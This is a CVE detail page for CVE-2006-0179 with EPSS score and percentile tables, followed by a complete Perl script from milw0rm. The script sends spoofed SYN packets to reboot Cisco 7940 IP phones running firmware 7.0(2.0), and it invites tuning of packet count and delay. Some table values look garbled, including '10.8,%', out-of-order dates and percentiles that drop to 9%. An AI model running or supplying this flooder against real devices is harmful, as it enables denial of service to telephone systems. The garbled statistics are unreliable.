CVE-2006-0179 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	11%	–	–
2022-04-03	–	–	11%	–	–
2022-05-22	–	–	11%	–	–
2023-03-12	–	–	–	2.2%	–
2023-04-23	–	–	–	3.62%	–
2023-09-17	–	–	–	3.62%	–
2024-04-14	–	–	–	3.62%	–
2024-06-02	–	–	–	3.62%	–
2024-12-22	–	–	–	2.25%	–
2025-03-02	–	–	–	2.25%	–
2025-01-19	–	–	–	2.25%	–
2025-03-09	–	–	–	2.25%	–
2025-03-18	–	–	–	–	10.58%
2025-04-16	–	–	–	–	10.8%
2025-04-16	–	–	–	–	10.8,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	89%
2022-04-03	94%
2022-05-22	95%
2023-03-12	88%
2023-04-23	9%
2023-09-17	91%
2024-04-14	92%
2024-06-02	92%
2024-12-22	89%
2025-03-02	9%
2025-01-19	89%
2025-03-09	9%
2025-03-18	93%
2025-04-16	93%
2025-04-16	93%

#!/usr/bin/perl # This is made for trashing cisco 7940 ip phones. kokanin made/discovered this. # A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my # phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!! # not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny # protocol - this is not for the SIP firmware. use Net::RawIP; use Time::HiRes; $pkt = new Net::RawIP; die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]); $pkt->set({ ip => { saddr => $ARGV[0], daddr => $ARGV[1] }, tcp=> { dest => $ARGV[2], syn => 1, seq => 0, ack => 0} }); for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; # milw0rm.com [2006-01-10]